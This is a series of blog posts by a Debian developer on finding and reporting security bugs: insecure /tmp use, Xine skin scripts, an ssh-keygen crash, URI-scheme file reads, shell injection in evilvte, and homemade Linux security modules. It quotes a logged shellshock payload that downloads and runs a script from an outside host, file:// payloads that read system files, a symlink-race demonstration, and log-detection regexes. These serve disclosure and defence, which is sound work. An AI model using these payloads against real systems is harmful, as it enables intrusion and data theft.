./mgmt/tools/SysAPI.cc:  tmp = fopen("/tmp/shadow", "w");
./mgmt/tools/SysAPI.cc:    system("/bin/mv -f /tmp/shadow /etc/shadow");

Is that really what it looks like? Really? Sadly yes.

There's lots of abuse of /tmp files in the code in mgmt/tools/, and although the modular structure took a while to understand the code that is compiled here ultimately ends up being included in /usr/bin/traffic_shell. That means it is a "real" security issue, allowing race-tastic local-attackers to do bad things.

Bug reported as #749846.

In happier news, the desk I was building is now complete. Pretty.

 

I feel like I should write about auditing software, but equally I feel unqualified - better people than me have already done so, e.g. David Wheeler.

Also I've done it before, and nobody paid attention. (Or rather the people that should consider security frequently fail to do so, which is .. frustrating.)

| 4 comments

 

So what can I do for Debian?

16 July 2014 21:50

So I recently announced my intention to rejoin the Debian project, having been a member between 2002 & 2011 (inclusive).

In the past I resigned mostly due to lack of time, and what has changed is that these days I have more free time - primarily because my wife works in accident & emergency and has "funny shifts". This means we spend many days and evenings together, then she might work 8pm-8am for three nights in a row, which then becomes Steve-time, and can involve lots of time browsing reddit, coding obsessively, and watching bad TV (currently watching "Lost Girl". Shades of Buffy/Blood Ties/similar. Not bad, but not great.)

My NM-progress can be tracked here, and once accepted I have a plan for my activities:

  • I will minimally audit every single package running upon any of my personal systems.
  • I will audit as many of the ITP-packages I can manage.
  • I may, or may not, actually package software.

I believe this will be useful, even though there will be limits - I've no patience for PHP and will just ignore it, along with its ecosystem, for example.

As progress today I reported #754899 / CVE-2014-4978 against Rawstudio, and discussed some issues with ITP: tiptop (the program seems semi-expected to be installed setuid(0), but if it is then it will allow arbitrary files to be truncated/overwritten via "tiptop -W /path/to/file").

(ObRandom still waiting for a CVE identifier for #749846/TS-2867..)

And now sleep.

| 4 comments

 

Did you know xine will download and execute scripts?

19 July 2014 21:50

Today I was poking around the source of Xine, the well-known media player. During the course of this poking I spotted that Xine has skin support - something I've been blissfully ignorant of for many years.

How do these skins work? You bring up the skin-browser, by default this is achieved by pressing "Ctrl-d". The browser will show you previews of the skins available, and allow you to install them.

How does Xine know what skins are available? It downloads an index file from the xine.sourceforge.net site - over plain, insecure, HTTP.

The downloaded file is a simple XML thing, containing references to both preview-images and download locations.

For example the theme "Sunset" has the following details:

  • Download link: http://xine.sourceforge.net/skins/Sunset.tar.gz
  • Preview link: http://xine.sourceforge.net/skins/Sunset.png

If you choose to install the skin the Sunset.tar.gz file is downloaded, via HTTP, extracted, and the shell-script doinst.sh is executed, if present.

So if you control DNS on your LAN you can execute arbitrary commands if you persuade a victim to download your "corporate xine theme".

Probably a low-risk attack, but still a surprise.

| 5 comments

 

luonnos viesti - 31 heinäkuu 2014 (draft post - 31 July 2014)

31 July 2014 21:50

Yesterday I spent a while looking at the Debian code search site, an enormously useful service allowing you to search the code contained in the Debian archives.

The end result was three trivial bug reports:

#756565 - lives

Insecure usage of temporary files.

A CVE-identifier should be requested.

#756566 - libxml-dt-perl

Insecure usage of temporary files.

A CVE-identifier has been requested by Salvatore Bonaccorso, and will be added to my security log once allocated.

#756600 - xcfa

Insecure usage of temporary files.

A CVE-identifier should be requested.

Finding these bugs was a simple matter of using the code-search to look for patterns like "system.*>.*/tmp".

Perhaps tomorrow somebody else would like to have a go at looking for backtick-related operations ("`"), or the usage of popen.

Tomorrow I will personally be swimming in a loch, which is more fun than wading in code..

| 2 comments

 

Paying attention to webserver logs

2 December 2014 21:50

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:

92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban (or even non-standard SSH ports).

For Apache/webserver exploits what do we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and is horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else thinks the rules are bad - which is what I thought of the PHP-IDS set - I guess it's hard to know.
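
To make the idea concrete, the sort of thing I have in mind is nothing more sophisticated than this sketch - the rules shown are illustrative examples, not a vetted ruleset:

#!/usr/bin/perl
# Run a handful of hand-written attack signatures over an Apache
# access log (given on the command line, or stdin) and report matches.
use strict;
use warnings;

my %rules = (
    'shellshock'          => qr/\(\)\s*\{\s*:;\s*\}\s*;/,
    'directory traversal' => qr{\.\./\.\./},
    'remote file include' => qr{=(?:https?|ftp)://}i,
);

while ( my $line = <> ) {
    my ($ip) = $line =~ /^(\S+)/;
    next unless defined $ip;
    for my $name ( sort keys %rules ) {
        print "$ip\t$name\n" if $line =~ $rules{$name};
    }
}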

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.

Shame.

| 14 comments

 

So about that idea of using ssh-keygen on untrusted input?

12 October 2015 21:50

My previous blog post related to using ssh-keygen to generate fingerprints from SSH public keys.

At the back of my mind was the fear that running the command against untrusted, user-supplied, keys might be a bad plan. So I figured I'd do some fuzzing to reassure myself.

The most excellent LWN recently published a piece on Fuzzing with american fuzzy lop, so with that to guide me I generated a pair of SSH public keys, and set to work.

Two days later I found an SSH public key that would make ssh-keygen segfault, and equally the SSH client (same parser), so that was a shock.

The good news is that my Perl module to fingerprint keys is used like so:

my $helper = SSHKey::Fingerprint->new( key => "ssh ...." );
if ( $helper->valid() ) {
   my $fingerprint = $helper->fingerprint();
   ...
}

The validity-test catches my bogus key, so in my personal use-cases this is OK. That said it's a surprise to see this:

skx@shelob ~ $ ssh -i key.trigger.pub steve@ssh.steve.org.uk 
Segmentation fault

Similarly running "ssh-keygen -l -f ~/key.trigger.pub" results in an identical segfault.

In practice this is a low-risk issue, hence mentioning it, and filing the bug-report publicly, even if code execution is possible. Because in practice how many times do people fingerprint keys from unknown sources? Except for things like GitHub's key management page?

Some people probably do it, but I assume they do it infrequently and only after some minimal checking.

Anyway we'll say this is my first security issue of 2015, we'll call it #roadhouse, and we'll get right on trademarking the term, designing the logo, and selling out for all the filthy filthy lucre ;)

| 3 comments

 

Finding and reporting trivial security issues

22 December 2015 21:50

This week I'll be mostly doing drive-by bug-reporting.

As with last year we start by using the Debian Code Search, to look for obviously broken patterns such as "system.*>.*/tmp/.*"

Once we find a fun match we examine the code and then report the bugs we find. Today that was stalin which runs some fantastic things on startup:

(system "uname -m >/tmp/QobiScheme.tmp")
(system "rm -f /tmp/QobiScheme.tmp"))

We can exploit this like so:

$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now we run the script:

$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK
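
The boring-but-safe alternative is to never hard-code a name under /tmp at all; sketched in Perl (stalin itself is Scheme, so this is the pattern rather than a patch):

#!/usr/bin/perl
# Let File::Temp pick an unpredictable name and open it O_EXCL,
# instead of trusting a fixed path like /tmp/QobiScheme.tmp.
use strict;
use warnings;
use File::Temp qw(tempfile);

my ( $fh, $filename ) = tempfile( "QobiScheme-XXXXXXXX", TMPDIR => 1, UNLINK => 1 );
print {$fh} scalar `uname -m`;
close $fh or die "close: $!";
print "machine type captured via $filename\n";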

For future reference the lsat package looks horrifically bad:

  • it writes multiple times to /tmp/lsat1.lsat and although it tries to detect races I'm not convinced. Something to look at in the future.

| No comments

 

If your code accepts URIs as input..

12 September 2016 21:50

There are many online sites that accept reading input from remote locations. For example a site might try to extract all the text from a webpage, or show you the HTTP-headers a given server sends back in response to a request.

If you run such a site you must make sure you validate the scheme you're given - also remembering to do that if you're sent any HTTP-redirects.
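
In Perl the easiest way I know to get both halves of that right is LWP::UserAgent's protocols_allowed - because the whitelist is enforced inside the agent it is also applied to any redirects the remote server sends:

#!/usr/bin/perl
# Fetch a user-supplied URL, but only ever over http or https - a
# file:// URL, or a redirect to one, gets an error response instead.
use strict;
use warnings;
use LWP::UserAgent;

my $url = shift @ARGV or die "usage: $0 URL\n";

my $ua = LWP::UserAgent->new( timeout => 10, max_redirect => 3 );
$ua->protocols_allowed( [ 'http', 'https' ] );

my $response = $ua->get($url);
die "fetch failed: ", $response->status_line, "\n" unless $response->is_success;

print $response->decoded_content;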

Really the issue here is a confusion between URL & URI.

The only time I ever communicated with Aaron Swartz was unfortunately after his death, because I didn't make the connection. I randomly stumbled upon the html2text software he put together, which had an online demo containing a form for entering a location. I tried the obvious input:

file:///etc/passwd

The software was vulnerable, read the file, and showed it to me.

The site gives errors on all inputs now, so it cannot be used to demonstrate the problem, but on Friday I saw another site on Hacker News with the very same input-issue, and it reminded me that there's a very real class of security problems here.

The site in question was http://fuckyeahmarkdown.com/ and allows you to enter a URL to convert to markdown - I found this via the hacker news submission.

The following link shows the contents of /etc/hosts, and demonstrates the problem:

http://fuckyeahmarkdown.example.com/go/?u=file:///etc/hosts&read=1&preview=1&showframe=0&submit=go

The output looked like this:

..
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
fe80::1%lo0 localhost
127.0.0.1 stage
127.0.0.1 files
127.0.0.1 brettt..
..

In the actual output of '/etc/passwd' all newlines had been stripped. (Which I now recognize as being an artifact of the markdown processing.)

UPDATE: The problem is fixed now.

| 9 comments

 

Detecting fraudulent signups?

21 November 2016 21:50

I run a couple of different sites that allow users to sign-up and use various services. In each of these sites I have some minimal rules in place to detect bad signups, but these are a little ad hoc, because the nature of "badness" varies on a per-site basis.

I've worked in a couple of places where there are in-house tests of bad signups, and these usually boil down to some naive, and overly-broad, rules:

  • Does the phone number's (international) prefix match the country of the user?
  • Does the postal address supplied even exist?

Some places penalise users based upon location too:

  • Does the IP address the user submitted from come from TOR?
  • Does the geo-IP country match the user's stated location?
  • Is the email address provided by a "free" provider?

At the moment I've got a simple HTTP-server which receives a JSON post of a new user's details, and returns "200 OK" or "403 Forbidden" based on some very very simple criteria. This is modelled on the spam-detection service for blog-comments that I use - something that is itself becoming less useful over time. (Perhaps time to kill that? A decision for another day.)
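
As a sketch of the shape of the thing - this is not the real service, and the only rule shown is the username example mentioned below - a minimal PSGI version fits in a page:

# app.psgi - accept a JSON POST of signup details, answer 200 or 403.
use strict;
use warnings;
use JSON qw(decode_json);

my @blocked = qw(admin help support root);

my $app = sub {
    my $env  = shift;
    my $body = '';
    if ( my $len = $env->{CONTENT_LENGTH} || 0 ) {
        $env->{'psgi.input'}->read( $body, $len );
    }

    my $user = eval { decode_json($body) } || {};
    my $name = lc( $user->{username} || '' );

    my $bad = grep { $name eq $_ } @blocked;

    return $bad
      ? [ 403, [ 'Content-Type' => 'text/plain' ], ["Forbidden\n"] ]
      : [ 200, [ 'Content-Type' => 'text/plain' ], ["OK\n"] ];
};

$app;    # run with: plackup app.psgi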

Unfortunately this whole approach is very reactive, as it takes human eyeballs to detect new classes of problems. Code can't guess in advance that it should block usernames which could collide with official ones, for example allowing a username of "admin", "help", or "support".

I'm certain that these systems have been written a thousand times, as I've seen at least five such systems, and they're all very similar. The biggest flaw in all these systems is that they try to classify users in advance of them doing anything. We're trying to say "Block users who will use stolen credit cards", or "Block users who'll submit spam", by correlating that behaviour with other things. In an ideal world you'd judge users only by the actions they take, not how they signed up. And yet .. it is better than nothing.

For the moment I'm continuing to try to make the best of things, at least by centralising the rules for myself I cut down on duplicate code. I'll pretend I'm being cool, modern, and sexy, and call this a micro-service! (Ignore the lack of containers for the moment!)

| No comments

 

Old packages are interesting.

9 February 2017 21:50

Recently Vincent Bernat wrote about writing his own simple terminal, using vte. That was a fun read, as the sample code built really easily and was functional.

At the end of his post he said :

evilvte is quite customizable and can be lightweight. Consider it as a first alternative. Honestly, I don’t remember why I didn’t pick it.

That set me off looking at evilvte, and it was one of those rare projects which seems to be pretty stable, and also hasn't changed in any recent release of Debian GNU/Linux:

  • lenny had 0.4.3-1.
  • etch had nothing.
  • squeeze had 0.4.6-1.
  • wheezy has release 0.5.1-1.
  • jessie has release 0.5.1-1.
  • stretch has release 0.5.1-1.
  • sid has release 0.5.1-1.

I wonder if it would be possible to easily generate a list of packages which have the same revision in multiple distributions? Anyway I had a look at the source, and unfortunately spotted that it didn't entirely handle clicking on hyperlinks terribly well. Clicking on a link would pretty much run:

 firefox '%s'

That meant there was an obvious security problem: the URL is interpolated straight into a shell command, so a page containing a link with a single-quote and shell metacharacters in it could execute arbitrary commands when clicked.
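
The fix for that class of bug is the same in every language: pass the URL to the child process as a discrete argument instead of interpolating it into a shell command. In Perl terms the difference looks like this (the payload is deliberately harmless):

use strict;
use warnings;

my $url = q{http://example.com/'; echo injected; true '};

# Interpolating into a shell command - the crafted URL escapes the
# quoting and the "echo injected" part runs:
system("firefox '$url'");

# Passing the URL as a separate argv element - no shell is involved,
# so the metacharacters are just part of an odd-looking URL:
system( "firefox", $url );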

It is a great terminal though, and it just goes to show how short, simple, and readable such things can be. I enjoyed looking at the source, and furthermore enjoyed using it. Unfortunately due to a dependency issue it looks like this package will be removed from stretch.

| 2 comments

 

So I accidentally wrote a linux security module

2 June 2017 21:50

Tonight I read this week's LWN quotes-page a little later than usual because I was busy at work for most of the day. Anyway as always LWN's content was awesome, and this particular list led to an interesting discussion about a new Linux-Security-Module (LSM).

That read weirdly; what I was trying to say was that every Thursday morning I like to read LWN at work. Tonight is the first chance I had to get round to it.

One of the later replies in the thread was particularly interesting as it said:

Suggestion:

Create an security module that looks for the attribute

    security.WHITELISTED

on things being executed/mmapped and denys it if the attribute
isn't present. Create a program (whitelistd) that reads
/etc/whitelist.conf and scans the system to ensure that only
things on the list have the attribute.

So I figured that was a simple idea, and it didn't seem too hard even for myself as a non-kernel non-developer. There are several Linux security modules included in the kernel-releases, beneath the top-level security/ directory, so I assumed I could copy & paste code from them to get something working.

During the course of all this work, which took about 90 minutes from start to Finnish (that pun never gets old), the online documentation was enormously useful.

Brief attr primer

If you're not familiar with the attr tool it's pretty simple. You can assign values to arbitrary labels on files. The only annoying thing is you have to use extra-flags to commands like rsync, tar, cp, etc, to preserve the damn things.

Set three attributes on the file named moi:

$ touch moi
$ attr -s forename -V "Steve"      moi
$ attr -s surname  -V "Kemp"       moi
$ attr -s name     -V "Steve Kemp" moi

Now list the attributes present:

$ attr -l moi
Attribute "name" has a 10 byte value for moi
Attribute "forename" has a 5 byte value for moi
Attribute "surname" has a 4 byte value for moi

And retrieve one?

$ attr -q -g name moi
Steve Kemp

LSM Skeleton

My initial starting point was to create "steve_lsm.c", with the following contents:

 #include <linux/lsm_hooks.h>

 /*
  * Log things for the moment.
  */
 static int steve_bprm_check_security(struct linux_binprm *bprm)
 {
     printk(KERN_INFO "STEVE LSM check of %s\n", bprm->filename);
     return 0;
 }

 /*
  * Only check exec().
  */
 static struct security_hook_list steve_hooks[] = {
     LSM_HOOK_INIT(bprm_check_security, steve_bprm_check_security),
 };

 /*
  * Somebody set us up the bomb.
  */
 static void __init steve_init(void)
 {
     security_add_hooks(steve_hooks, ARRAY_SIZE(steve_hooks), "steve");
     printk(KERN_INFO "STEVE LSM initialized\n");
 }

With that in place I had to modify the various KBuild files beneath security/ to make sure this could be selected as an LSM, and add in a Makefile to the new directory security/steve/.

With the boiler-plate done though, and the host machine rebooted into my new kernel it was simple to test things out.

Obviously the first step, post-boot, is to make sure that the module is active, which can be done in two ways, looking at the output of dmesg, and explicitly listing the modules available:

 ~# dmesg | grep STEVE | head -n2
 STEVE LSM initialized
 STEVE LSM check of /init

 $ echo $(cat /sys/kernel/security/lsm)
 capability,steve

Making the LSM functional

The next step was to make the module do more than mere logging. In short this is what we want:

  • If a binary is invoked by root - allow it.
    • Although note that this might leave a hole, if the user can enter a new namespace where their UID is 0..
  • If a binary is invoked by a non-root user look for an extended attribute on the target-file named security.WHITELISTED.
    • If this is present we allow the execution.
    • If this is missing we deny the execution.

NOTE we don't care what the content of the extended attribute is, we just care whether it exists or not.

Reading the extended attribute is pretty simple, using the __vfs_getxattr function. All in all our module becomes this:

  #include <linux/xattr.h>
  #include <linux/binfmts.h>
  #include <linux/lsm_hooks.h>
  #include <linux/sysctl.h>
  #include <linux/ptrace.h>
  #include <linux/prctl.h>
  #include <linux/ratelimit.h>
  #include <linux/workqueue.h>
  #include <linux/string_helpers.h>
  #include <linux/task_work.h>
  #include <linux/sched.h>
  #include <linux/spinlock.h>
  #include <linux/lsm_hooks.h>


  /*
   * Perform a check of a program execution/map.
   *
   * Return 0 if it should be allowed, -EPERM on block.
   */
  static int steve_bprm_check_security(struct linux_binprm *bprm)
  {
         // The current task & the UID it is running as.
         const struct task_struct *task = current;
         kuid_t uid = task->cred->uid;

         // The target we're checking
         struct dentry *dentry = bprm->file->f_path.dentry;
         struct inode *inode = d_backing_inode(dentry);

         // The size of the label-value (if any).
         int size = 0;

         // Root can access everything.
         if ( uid.val == 0 )
            return 0;

         size = __vfs_getxattr(dentry, inode, "user.whitelisted", NULL, 0);
         if ( size >= 0 )
         {
             printk(KERN_INFO "STEVE LSM check of %s resulted in %d bytes from 'user.whitelisted' - permitting access for UID %d\n", bprm->filename, size, uid.val );
             return 0;
         }

         printk(KERN_INFO "STEVE LSM check of %s denying access for UID %d [ERRO:%d] \n", bprm->filename, uid.val, size );
         return -EPERM;
  }

  /*
   * The hooks we wish to be installed.
   */
  static struct security_hook_list steve_hooks[] = {
       LSM_HOOK_INIT(bprm_check_security, steve_bprm_check_security),
  };

  /*
   * Initialize our module.
   */
  void __init steve_add_hooks(void)
  {
       /* register ourselves with the security framework */
       security_add_hooks(steve_hooks, ARRAY_SIZE(steve_hooks), "steve");

       printk(KERN_INFO "STEVE LSM initialized\n");
  }

Once again we reboot with this new kernel, and we test that the LSM is active. After the basic testing, as before, we can now test real functionality. By default no binaries will have the attribute we look for present - so we'd expect ALL commands to fail, unless executed by root. Let us test that:

~# su - nobody -s /bin/sh
No directory, logging in with HOME=/
Cannot execute /bin/sh: Operation not permitted

That looks like it worked. Let us allow users to run /bin/sh:

 ~# attr -s whitelisted -V 1 /bin/sh

Unfortunately that fails, because symlinks are weird, but repeating the test with /bin/dash works as expected:

 ~# su - nobody -s /bin/dash
 No directory, logging in with HOME=/
 Cannot execute /bin/dash: Operation not permitted

 ~# attr -s whitelisted -V 1 /bin/dash
 ~# attr -s whitelisted -V 1 /usr/bin/id

 ~# su - nobody -s /bin/dash
 No directory, logging in with HOME=/
 $ id
 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

 $ uptime
 -su: 2: uptime: Operation not permitted

And our logging shows the useful results as we'd expect:

  STEVE LSM check of /usr/bin/id resulted in 1 bytes from 'user.WHITELISTED' - permitting access for UID 65534
  STEVE LSM check of /usr/bin/uptime denying access for UID 65534 [ERRO:-95]

Surprises

If you were paying careful attention you'll have noticed that we changed what we did part-way through this guide.

  • The initial suggestion said to look for security.WHITELISTED.
  • But in the kernel module I look for user.whitelisted.
    • And when setting the attribute I only set whitelisted.

I'm not sure exactly what is going on there, but it was very confusing. It appears that when you set an attribute with the attr tool a user. prefix is silently added to the name.

Could be worth some research by somebody with more time on their hands than I have.
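
For what it's worth, doing the same thing with the raw setxattr(2) call makes the namespace explicit - something like this, which I've not tested as part of the module itself, should set the attribute the LSM expects:

  #include <stdio.h>
  #include <sys/xattr.h>

  int main(void)
  {
      /* The LSM looks for "user.whitelisted"; with the raw syscall the
       * "user." namespace must be given explicitly, whereas the attr
       * tool adds it behind your back. */
      if (setxattr("/bin/dash", "user.whitelisted", "1", 1, 0) != 0) {
          perror("setxattr");
          return 1;
      }
      return 0;
  }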

Anyway I don't expect this is a terribly useful module, but it was my first, and I think it should be pretty stable. Feedback on my code certainly welcome!

| 3 comments

 

Linux security modules, round two.

25 June 2017 21:50

So recently I wrote a Linux Security Module (LSM) which would deny execution of commands, unless an extended attribute existed upon the filesystem belonging to the executables.

The whitelist-LSM worked well, but it soon became apparent that it was a little pointless. Most security changes are pointless unless you define what you're defending against - your "threat model".

In my case it was written largely as a learning experience, but also because I figured it seemed like it could be useful. However it wasn't actually that useful, because you soon realize that you have to whitelist too much:

  • The redis-server binary must be executable by the redis user, otherwise the service won't run.
  • /usr/bin/git must be executable by the git user.

In short there comes a point where user alice must run executable blah. If alice can run it, then so can mallory. At which point you realize the exercise is not so useful.

Taking a step back I realized that what I wanted to prevent was the execution of unknown, unexpected, and malicious binaries. How do you identify known-good binaries? Well, hashes & checksums are good. So for my second attempt I figured I'd not look for a mere "flag" on a binary, but instead look for a valid hash.

Now my second LSM is invoked for every binary that is executed by a user:

  • When a binary is executed the SHA1 hash of the file's contents is calculated.
  • If that matches the value stored in an extended attribute the execution is permitted (sketched below).
    • If the extended-attribute is missing, or the checksum doesn't match, then the execution is denied.
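
Roughly speaking the check inside the bprm hook looks something like this - treat it as a sketch rather than the real thing; in particular the attribute name user.sha1, the hex encoding, and the sha1_file() helper (sketched a little further down) are illustrative choices of mine:

  #include <linux/binfmts.h>
  #include <linux/cred.h>
  #include <linux/fs.h>
  #include <linux/kernel.h>
  #include <linux/string.h>
  #include <linux/xattr.h>

  /* Helper which SHA1s an open file - sketched later in this post. */
  static int sha1_file(struct file *file, u8 *digest);

  static int hashcheck_bprm_check_security(struct linux_binprm *bprm)
  {
          struct dentry *dentry = bprm->file->f_path.dentry;
          struct inode *inode = d_backing_inode(dentry);
          u8 digest[20];
          char computed[41];
          char stored[41];
          int size;
          int i;

          // Root can execute everything, as before.
          if (uid_eq(current_uid(), GLOBAL_ROOT_UID))
                  return 0;

          // Fetch the expected hash; no attribute means no execution.
          size = __vfs_getxattr(dentry, inode, "user.sha1",
                                stored, sizeof(stored) - 1);
          if (size < 0)
                  return -EPERM;
          stored[size] = '\0';

          // Hash the file's contents and hex-encode the digest.
          if (sha1_file(bprm->file, digest) != 0)
                  return -EPERM;
          for (i = 0; i < 20; i++)
                  sprintf(computed + i * 2, "%02x", digest[i]);

          // Only a matching hash permits the execution.
          return strcmp(computed, stored) == 0 ? 0 : -EPERM;
  }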

In practice this is the same behaviour as the previous LSM - a binary is either executable, because there is a good hash, or it is not, because the hash is missing or bogus. If somebody deploys a binary rootkit this will definitely stop it from executing, but of course there is a huge hole - scripting-languages:

  • If /usr/bin/perl is whitelisted then /usr/bin/perl /tmp/exploit.pl will succeed.
  • If /usr/bin/python is whitelisted then the same applies.

Despite that, the project was worthwhile: I can clearly describe what it is designed to achieve ("Deny the execution of unknown binaries", and "Deny binaries that have been modified"), and I learned how to hash a file from kernel-space - which was surprisingly simple.
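
For the curious, hashing a file from kernel-space boils down to the crypto_shash API - something along these lines, assuming a kernel recent enough that kernel_read() takes a loff_t pointer (again a sketch, not the module's exact code):

  #include <crypto/hash.h>
  #include <linux/fs.h>
  #include <linux/mm.h>
  #include <linux/slab.h>

  /* Compute the SHA1 digest (20 bytes) of an already-open file. */
  static int sha1_file(struct file *file, u8 *digest)
  {
          struct crypto_shash *tfm;
          u8 *buf;
          loff_t pos = 0;
          ssize_t n;
          int rc;

          tfm = crypto_alloc_shash("sha1", 0, 0);
          if (IS_ERR(tfm))
                  return PTR_ERR(tfm);

          buf = kmalloc(PAGE_SIZE, GFP_KERNEL);
          if (!buf) {
                  crypto_free_shash(tfm);
                  return -ENOMEM;
          }

          {
                  SHASH_DESC_ON_STACK(desc, tfm);
                  desc->tfm = tfm;

                  rc = crypto_shash_init(desc);

                  // Feed the file to the hash a page at a time.
                  while (rc == 0 &&
                         (n = kernel_read(file, buf, PAGE_SIZE, &pos)) > 0)
                          rc = crypto_shash_update(desc, buf, n);

                  if (rc == 0)
                          rc = crypto_shash_final(desc, digest);
          }

          kfree(buf);
          crypto_free_shash(tfm);
          return rc;
  }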

(Yes I know about IMA and EVM - this was a simple project for learning purposes. Public-key signatures will be something I'll look at next/soon/later. :)

Perhaps the only other thing to explore is the complexity in allowing/denying actions based on the user - in a human-readable fashion, not via UIDs. So www-data can execute some programs, alice can run a different set of binaries, and git can only run /usr/bin/git.

Of course down that path lies apparmour, selinux, and madness..

| 2 comments

 

Yet more linux security module craziness ..

29 June 2017 21:50

I've recently been looking at linux security modules. My first two experiments helped me learn:

My First module - whitelist_lsm.c

This looked for the presence of an xattr, and if present allowed execution of binaries.

I learned about the Kernel build-system, and how to write a simple LSM.

My second module - hashcheck_lsm.c

This looked for the presence of a "known-good" SHA1 hash xattr, and if it matched the actual hash of the file on-disk allowed execution.

I learned how to hash the contents of a file, from kernel-space.

Both allowed me to learn things, but both were a little pointless. They were not fine-grained enough to allow different things to be done by different users. (i.e. If you allowed "alice" to run "wget" you'd also allow www-data to do the same.)

So, assuming you wanted to do your security job more neatly what would you want? You'd want to allow/deny execution of commands based upon:

  • The user who was invoking them.
  • The path of the binary itself.

So your local users could run "bad" commands, but "www-data" (post-compromise) couldn't.

Obviously you don't want to have to recompile your kernel to change the rules of who can execute what. So you think to yourself "I'll write those rules down in a file". But of course reading a file from kernel-space is tricky. And parsing any list of rules, in a file, from kernel-space would be prone to buffer-related problems.

So I had a crazy idea:

  • When a user attempts to execute a program.
  • Call back to user-space to see if that should be permitted.
    • Give the user-space binary the UID of the invoker, and the path to the command they're trying to execute.

Calling userspace? Every time a command is to be executed? Crazy. But it just might work.

One problem I had with this approach is that userspace might not even be available when you're booting. So I set up a flag to enable this stuff:

# echo 1 >/proc/sys/kernel/can-exec/enabled
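
Exposing that flag is just a small sysctl table - a sketch along these lines (my names, and not necessarily identical to the real code) gives you /proc/sys/kernel/can-exec/enabled:

  #include <linux/init.h>
  #include <linux/sysctl.h>

  // Zero by default, so nothing is enforced until userspace is ready.
  static int can_exec_enabled;

  static struct ctl_table can_exec_table[] = {
          {
                  .procname     = "enabled",
                  .data         = &can_exec_enabled,
                  .maxlen       = sizeof(int),
                  .mode         = 0644,
                  .proc_handler = proc_dointvec,
          },
          { }
  };

  static void __init can_exec_init_sysctl(void)
  {
          register_sysctl("kernel/can-exec", can_exec_table);
  }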

Now the kernel will invoke the following on every command:

/sbin/can-exec $UID $PATH
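
On the kernel side the hook boils down to something like this - a sketch built on the standard call_usermodehelper() API; the function name and details here are illustrative rather than the exact code, and can_exec_enabled is the sysctl-backed flag from the sketch above:

  #include <linux/binfmts.h>
  #include <linux/cred.h>
  #include <linux/kernel.h>
  #include <linux/kmod.h>

  static int can_exec_bprm_check_security(struct linux_binprm *bprm)
  {
          char uid_str[16];
          char *argv[4];
          char *envp[] = { NULL };
          int ret;

          // Do nothing until userspace has flipped the sysctl flag.
          if (!can_exec_enabled)
                  return 0;

          snprintf(uid_str, sizeof(uid_str), "%d",
                   from_kuid(&init_user_ns, current_uid()));

          argv[0] = "/sbin/can-exec";
          argv[1] = uid_str;
          argv[2] = (char *)bprm->filename;
          argv[3] = NULL;

          // UMH_WAIT_PROC blocks until the helper exits, and gives us
          // its exit status - anything non-zero means "deny".
          ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
          if (ret != 0)
                  return -EPERM;

          return 0;
  }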

Because the kernel waits for this command to complete - as it reads the exit-code - you cannot execute any child-processes from it, as you'd end up in recursive hell, but you can certainly read files, write to syslog, etc. My initial implementation was as basic as this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>

int main( int argc, char *argv[] )
{
  /* ... argument-count checking elided ... */

  // Get the UID + Program
  int uid = atoi( argv[1] );
  char *prg = argv[2];

  // syslog
  openlog ("can-exec", LOG_CONS | LOG_PID | LOG_NDELAY, LOG_LOCAL1);
  syslog (LOG_NOTICE, "UID:%d CMD:%s", uid, prg );

  // root can do all.
  if ( uid == 0 )
    return 0;

  // nobody
  if ( uid == 65534 ) {
    if ( ( strcmp( prg , "/bin/sh" ) == 0 ) ||
         ( strcmp( prg , "/usr/bin/id" ) == 0 ) ) {
      fprintf(stderr, "Allowing 'nobody' access to shell/id\n" );
      return 0;
    }
  }

  fprintf(stderr, "Denied\n" );
  return -1;
}

Although the UIDs are hard-coded it actually worked! Yay!

I updated the code to convert the UID to a username, then check executables via the file /etc/can-exec/$USERNAME.conf, and this also worked.
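
The lookup itself is nothing special - something like this, give or take (the one-path-per-line config format shown here is just for illustration):

  #include <pwd.h>
  #include <stdio.h>
  #include <string.h>

  /* Is the UID allowed to execute the given program?  Map the UID to a
   * username, then look for the program in /etc/can-exec/$USERNAME.conf. */
  static int allowed(int uid, const char *prg)
  {
      struct passwd *pw = getpwuid(uid);
      char path[256];
      char line[1024];
      FILE *fp;
      int ok = 0;

      if (pw == NULL)
          return 0;

      snprintf(path, sizeof(path), "/etc/can-exec/%s.conf", pw->pw_name);

      fp = fopen(path, "r");
      if (fp == NULL)
          return 0;                         /* no config file: deny */

      while (fgets(line, sizeof(line), fp) != NULL) {
          line[strcspn(line, "\n")] = '\0'; /* strip the trailing newline */
          if (strcmp(line, prg) == 0) {
              ok = 1;
              break;
          }
      }

      fclose(fp);
      return ok;
  }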

I don't expect anybody to actually use this code, but I do think I've reached a point where I can pretend I've written a useful (or non-pointless) LSM at last. That means I can stop.

 

bind9 considered harmful

11 July 2017 21:50

Recently there was another bind9 security update released by the Debian Security Team. I thought that was odd, so I scanned my mailbox:

  • 11 January 2017
    • DSA-3758 - bind9
  • 26 February 2017
    • DSA-3795-1 - bind9
